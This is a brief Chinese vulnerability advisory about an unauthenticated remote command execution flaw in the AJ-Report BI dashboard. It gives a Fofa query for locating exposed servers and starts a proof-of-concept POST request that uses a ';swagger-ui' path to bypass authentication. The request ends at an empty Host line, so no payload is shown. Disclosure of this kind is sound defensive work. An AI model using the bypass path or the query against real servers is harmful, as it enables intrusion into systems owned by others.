简介
AJ-Report是一个完全开源的BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu等多种驱动,支持自定义数据集省去数据接口开发,支持17+种大屏组件,不会开发,照着设计稿也可以制作大屏。
漏洞描述
AJ-Report开源数据大屏 verification;swagger-ui接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此类漏洞执行任意命令,写入后门文件,最终可获取服务器权限。
影响版本与影响数量
影响版本:AJ-Report开源数据大屏
影响数量:634
Fofa:title=”AJ-Report”
漏洞编号与披露时间
漏洞编号:暂无
披露时间:2024-05-03
漏洞复现
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: